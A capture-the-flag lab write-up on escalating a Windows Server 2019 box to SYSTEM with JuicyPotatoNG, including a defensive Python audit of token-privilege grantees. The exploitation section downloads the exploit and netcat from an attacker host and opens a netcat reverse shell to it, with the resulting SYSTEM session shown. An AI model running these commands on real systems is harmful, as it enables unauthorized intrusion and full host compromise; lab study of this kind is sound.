JuicyPotatoNG
The compromised iis-default account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. This makes the target system vulnerable to the Potato family of exploits.
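Because these two privileges are the precondition for the whole Potato family, the defensive question is which accounts on a host actually hold them. The script below is an added example written for this writeup (it is not part of JuicyPotatoNG or the original post): it parses the [Privilege Rights] section of a `secedit /export /cfg` policy export and reports any grantee of SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege that is not in the default Windows baseline. The embedded export is constructed, and the domain SID `S-1-5-21-1000-2000-3000-1105` is a placeholder standing in for a service account such as iis-default.

```python
"""Audit a secedit export for holders of the token privileges the Potato
attacks depend on.

Added example for this writeup, not code from JuicyPotatoNG or the original
post.  On a real host the export is produced with
`secedit /export /cfg C:\\tmp\\policy.inf` (UTF-16 text); a constructed
export is embedded here so the audit runs offline.
"""

# Privileges the writeup names as the precondition for Potato attacks.
WATCHED = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Grantees that hold these rights on a default Windows install.  Anything
# beyond this set (for example a domain service account) deserves a look.
BASELINE = {
    "SeImpersonatePrivilege": {"S-1-5-32-544", "S-1-5-6", "S-1-5-19", "S-1-5-20"},
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
}

# Well-known SIDs, resolved locally so no Windows API is needed.
WELL_KNOWN = {
    "S-1-5-6": "NT AUTHORITY\\SERVICE",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-568": "BUILTIN\\IIS_IUSRS",
}

# Constructed sample export.  The S-1-5-21-... SID is a placeholder for a
# domain account like the writeup's iis-default; it is not a real value.
SAMPLE_INF = """[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-21-1000-2000-3000-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1000-2000-3000-1105
SeShutdownPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text):
    """Return {privilege: set(of SIDs)} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # secedit writes each grantee as *SID; strip the marker.
        sids = {s.strip().lstrip("*") for s in value.split(",") if s.strip()}
        rights[name.strip()] = sids
    return rights


def resolve(sid):
    """Map a well-known SID to its account name, else return the SID."""
    return WELL_KNOWN.get(sid, sid)


def unexpected_grantees(rights, watched=WATCHED, baseline=BASELINE):
    """Grantees of each watched privilege that are outside the baseline."""
    findings = {}
    for priv in watched:
        extra = rights.get(priv, set()) - baseline.get(priv, set())
        if extra:
            findings[priv] = sorted(resolve(s) for s in extra)
    return findings


def load_export(path):
    """Parse a real secedit export, which is written as UTF-16 with a BOM."""
    with open(path, encoding="utf-16") as fh:
        return parse_privilege_rights(fh.read())


if __name__ == "__main__":
    report = unexpected_grantees(parse_privilege_rights(SAMPLE_INF))
    for priv, who in report.items():
        print(f"{priv}: non-default grantees -> {', '.join(who)}")
```

Run against a real export with `load_export(r"C:\tmp\policy.inf")`; any account the report lists is one whose compromise would hand an attacker the same starting position the writeup describes, so the fix is to run such workloads under an identity that does not need these rights or to remove the right from the account.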
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 and Windows Server 2019. The target system is Windows Server 2019, so I need something else.
There is a newer version of JuicyPotato called JuicyPotatoNG that works:
- it is the newest version of the Potato exploits
- it uses a spoofing technique to bypass the Windows firewall restriction (if enabled)
- it is able to exploit LOCALLY
- more info on the exploit can be found in the project's GitHub repo
The binary can be downloaded from the official GitHub repo.
Exploitation
PS C:\tmp> iwr -Uri http://10.10.16.8/potato/JuicyPotatoNG.exe -OutFile C:\tmp\JuicyPotatoNG.exe
PS C:\tmp> iwr -Uri http://10.10.16.8/potato/nc64.exe -OutFile C:\tmp\nc64.exe
Delivery complete. Netcat will be used as the reverse shell payload for code execution.
PS C:\tmp> .\JuicyPotatoNG.exe -t * -p C:\tmp\nc64.exe -a "10.10.16.8 1235 -e cmd"
Executing
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 1235
listening on [any] 1235 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 54300
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\> whoami
whoami
nt authority\system

C:\> hostname
hostname
g0

C:\> ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::23d
   IPv6 Address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
   Link-local IPv6 Address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
   IPv4 Address. . . . . . . . . . . : 10.10.11.187
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2
System Level Compromise